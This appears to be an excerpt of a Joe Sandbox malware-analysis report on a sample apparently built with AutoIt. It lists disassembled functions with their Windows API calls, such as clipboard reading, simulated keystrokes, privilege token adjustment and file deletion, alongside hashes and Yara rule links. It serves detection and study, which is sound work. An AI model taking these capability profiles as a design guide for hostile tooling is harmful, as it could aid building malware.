                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1396898556-0
                                                                                                                • Opcode ID: e509055312bbd595a2cf7b5c5594010befd7f3f15a87d9135fadaee7c1772ebd
                                                                                                                • Instruction ID: 3048ab3f7887b736d1f27f21b9650d26a3c2753ea3444715aba7d07ac1a37dac
                                                                                                                • Opcode Fuzzy Hash: e509055312bbd595a2cf7b5c5594010befd7f3f15a87d9135fadaee7c1772ebd
                                                                                                                • Instruction Fuzzy Hash: 3711C132620315ABCB14FF64EC06F9D76A99F40700F108829F646A60C3DBB0AA659F50
                                                                                                                Function 0027AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: fa5d8a09dba538e8c349118664f711c0790d529e50bff5ef91e99d6913be3cd7
                                                                                                                • Instruction ID: 31a481b669de6986e4cb2617e8f3784f9448511746286d81cdbdef72eaaa3dac
                                                                                                                • Opcode Fuzzy Hash: fa5d8a09dba538e8c349118664f711c0790d529e50bff5ef91e99d6913be3cd7
                                                                                                                • Instruction Fuzzy Hash: 6D215770128211DFEB24DF64D484B5ABBE1BF89304F154968F9994B272C371F8A5CF52
                                                                                                                Function 0020CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction ID: 4c79836a7edeeeaee2cc4b0f06804ff5d568833beaf310990766c13c9f08f08e
                                                                                                                • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction Fuzzy Hash: 9801DBB11207016ED3149F78D807F66B7D4DF54760F60862AF95AC61D1EB71E4608A50
                                                                                                                Function 00203E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,002034E2,?,00000001), ref: 00203E6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 54d01afb35f261f2237937f09bc63770e4abadc9d8cbb869a6990a19f5e7743a
                                                                                                                • Instruction ID: 1d5add09feb27da4c4901466275ab6bb5c3c90ac1fbec15ca27d2e30e4a93d0b
                                                                                                                • Opcode Fuzzy Hash: 54d01afb35f261f2237937f09bc63770e4abadc9d8cbb869a6990a19f5e7743a
                                                                                                                • Instruction Fuzzy Hash: ACF0A972021302CFCB34DF64E894812BBE8AF047253208B3EE1C6826A2C7319968CF00
                                                                                                                Function 00222011 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 0022201B
                                                                                                                  • Part of subcall function 00221EE2: __lock.LIBCMT ref: 00221EF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 368792745-0
                                                                                                                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction ID: 6bda99ab690d445db5b1a4e60f259c8c50b8f8bc114797f89b03b594f485c2a8
                                                                                                                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction Fuzzy Hash: A7B0123158030C33D9102DC1FC03F053B0C4760B60F200020FE0C1C1E1E593B57445C9
                                                                                                                Function 00224129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wfsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 197181222-0
                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction ID: 2fc7680f6192c0da58de65a8ae1d8b8061f1354e7d532826ce1bca4257ac1088
                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction Fuzzy Hash: 82B0927244031C77CE012A82EC02A493F199B50664F008020FB0C1C161A673AAB09A89

                                                                                                                Non-executed Functions

                                                                                                                Function 0026F5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0026F64E
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0026F6AD
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026F6EA
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0026F711
                                                                                                                • SendMessageW.USER32 ref: 0026F737
                                                                                                                • _wcsncpy.LIBCMT ref: 0026F7A3
                                                                                                                • GetKeyState.USER32(00000011), ref: 0026F7C4
                                                                                                                • GetKeyState.USER32(00000009), ref: 0026F7D1
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0026F7E7
                                                                                                                • GetKeyState.USER32(00000010), ref: 0026F7F1
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0026F820
                                                                                                                • SendMessageW.USER32 ref: 0026F843
                                                                                                                • SendMessageW.USER32(?,00001030,?,0026DE69), ref: 0026F940
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0026F956
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0026F967
                                                                                                                • SetCapture.USER32(?), ref: 0026F970
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026F9D4
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0026F9E0
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0026F9FA
                                                                                                                • ReleaseCapture.USER32 ref: 0026FA05
                                                                                                                • GetCursorPos.USER32(?), ref: 0026FA3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026FA47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0026FAA9
                                                                                                                • SendMessageW.USER32 ref: 0026FAD3
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0026FB12
                                                                                                                • SendMessageW.USER32 ref: 0026FB3D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0026FB55
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0026FB60
                                                                                                                • GetCursorPos.USER32(?), ref: 0026FB81
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026FB8E
                                                                                                                • GetParent.USER32(?), ref: 0026FBAA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0026FC10
                                                                                                                • SendMessageW.USER32 ref: 0026FC40
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026FC96
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0026FCC2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0026FCEA
                                                                                                                • SendMessageW.USER32 ref: 0026FD0D
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026FD57
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0026FD87
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026FE1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 2516578528-4164748364
                                                                                                                • Opcode ID: d5e7331357ac24b2088e6671a485dc785933065d8dcc5b6383dc0aeaaced89ba
                                                                                                                • Instruction ID: b44fa79e5ef8dd21aab15129acb76f9f38eb6efa8d5677c4c2bb46c4ee29ba01
                                                                                                                • Opcode Fuzzy Hash: d5e7331357ac24b2088e6671a485dc785933065d8dcc5b6383dc0aeaaced89ba
                                                                                                                • Instruction Fuzzy Hash: 6432E074214206AFDB50DF28E988EAABBE8FF48314F144629F665872B1D731DCA4CB51
                                                                                                                Function 0026A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0026AFDB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 8ae8734ae2fdc80d8435d21a5592dfeaa45c495b1aa824d4c05b2c670efa4343
                                                                                                                • Instruction ID: e78858e8e4171b64d78051cba1d2e3e817638e4399ce389cee604793dd58950b
                                                                                                                • Opcode Fuzzy Hash: 8ae8734ae2fdc80d8435d21a5592dfeaa45c495b1aa824d4c05b2c670efa4343
                                                                                                                • Instruction Fuzzy Hash: 331203B1520219ABEB249F64EC49FAE7BB8FF45310F104219F509EB1D1DBB18991CF52
                                                                                                                Function 0021F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 0021F796
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00274388
                                                                                                                • IsIconic.USER32(000000FF), ref: 00274391
                                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 0027439E
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 002743A8
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002743BE
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 002743C5
                                                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002743D1
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002743E2
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002743EA
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 002743F2
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 002743F5
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027440A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274415
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027441F
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274424
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027442D
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274432
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027443C
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274441
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00274444
                                                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0027446B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 4df4565498ad0710f2e2fe65a6c10ef1b166271e27ceb3fc9c66d2f23b9cffe7
                                                                                                                • Instruction ID: ab1f4591d584cda7326a4751a2f1117ab9613ed9a60f7d54d613a0c0141f6a5e
                                                                                                                • Opcode Fuzzy Hash: 4df4565498ad0710f2e2fe65a6c10ef1b166271e27ceb3fc9c66d2f23b9cffe7
                                                                                                                • Instruction Fuzzy Hash: 1F318175A50218BBEB216F71AC4EF7F7F6CEB44B50F108025FA09AA1D0D7B05D11ABA0
                                                                                                                Function 0020BDF0 Relevance: 37.4, APIs: 12, Strings: 9, Instructions: 643COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002C22E8,?,00000000,?,00203E2E,?,00000000,?,0029DBF0,00000000,?), ref: 0020BE8B
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00203E2E,?,00000000,?,0029DBF0,00000000,?,00000002), ref: 0020BEA7
                                                                                                                • __wsplitpath.LIBCMT ref: 0020BF19
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcscpy.LIBCMT ref: 0020BF31
                                                                                                                • _wcscat.LIBCMT ref: 0020BF46
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0020BF56
                                                                                                                • _wcscpy.LIBCMT ref: 0020C03E
                                                                                                                • _wcscpy.LIBCMT ref: 0020C1ED
                                                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 0020C250
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 0020C320: _memmove.LIBCMT ref: 0020C419
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$",
                                                                                                                • API String ID: 2542276039-3655152795
                                                                                                                • Opcode ID: 293feca66426c9364c970fb1091b3f95b1d96b4cd826bef6709f8eef2844154d
                                                                                                                • Instruction ID: 92e470f9f7d2623e4af733c95537e7a57c92879abf6f3557bcc1cae582b01b7d
                                                                                                                • Opcode Fuzzy Hash: 293feca66426c9364c970fb1091b3f95b1d96b4cd826bef6709f8eef2844154d
                                                                                                                • Instruction Fuzzy Hash: E042A3B15283419FD710DF60D841BABB7E8AF94300F10492DF98987292DB71EA69CF93
                                                                                                                Function 0023B9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
                                                                                                                  • Part of subcall function 0023BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
                                                                                                                  • Part of subcall function 0023BEC3: GetLastError.KERNEL32 ref: 0023BF49
                                                                                                                • _memset.LIBCMT ref: 0023BA34
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0023BA86
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023BA97
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0023BAAE
                                                                                                                • GetProcessWindowStation.USER32 ref: 0023BAC7
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 0023BAD1
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0023BAEB
                                                                                                                  • Part of subcall function 0023B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0023B9EC), ref: 0023B8C5
                                                                                                                  • Part of subcall function 0023B8B0: CloseHandle.KERNEL32(?,?,0023B9EC), ref: 0023B8D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                • Opcode ID: 0d57ea1ad7da619cbea3cbd3eced8f9af41881c23767211ae04b451ed9b113a9
                                                                                                                • Instruction ID: 6ecc82c13e92943d19169d143024d6584b60f63feca1cb282dc01c7f53540dde
                                                                                                                • Opcode Fuzzy Hash: 0d57ea1ad7da619cbea3cbd3eced8f9af41881c23767211ae04b451ed9b113a9
                                                                                                                • Instruction Fuzzy Hash: 738162B192120DAFDF12DFA4DD49AEEBB79EF04304F14451AFA14A6191DB318E25DF10
                                                                                                                Function 00246B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                  • Part of subcall function 00247B9F: __wsplitpath.LIBCMT ref: 00247BBC
                                                                                                                  • Part of subcall function 00247B9F: __wsplitpath.LIBCMT ref: 00247BCF
                                                                                                                  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
                                                                                                                • _wcscat.LIBCMT ref: 00246B9D
                                                                                                                • _wcscat.LIBCMT ref: 00246BBB
                                                                                                                • __wsplitpath.LIBCMT ref: 00246BE2
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00246BF8
                                                                                                                • _wcscpy.LIBCMT ref: 00246C57
                                                                                                                • _wcscat.LIBCMT ref: 00246C6A
                                                                                                                • _wcscat.LIBCMT ref: 00246C7D
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00246CAB
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00246CBC
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00246CDB
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00246CEA
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 00246CFF
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00246D10
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00246D37
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00246D53
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00246D61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1867810238-1173974218
                                                                                                                • Opcode ID: ccb719d2353c6211f1f9f8e6b223d2b801a6c530fbd1869e021b55ed6b88d7bb
                                                                                                                • Instruction ID: d0aeacd373a90749d734cf63c54cddc871fd2fa79724f3d46787aba22fc7dc00
                                                                                                                • Opcode Fuzzy Hash: ccb719d2353c6211f1f9f8e6b223d2b801a6c530fbd1869e021b55ed6b88d7bb
                                                                                                                • Instruction Fuzzy Hash: 76514F7291126DAACB25DFA0DC88EEE777CAF0A304F4445D6E549A3051DB309B9CCF61
                                                                                                                Function 00257099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(0029DBF0), ref: 002570C3
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 002570D1
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 002570D9
                                                                                                                • CloseClipboard.USER32 ref: 002570E5
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00257101
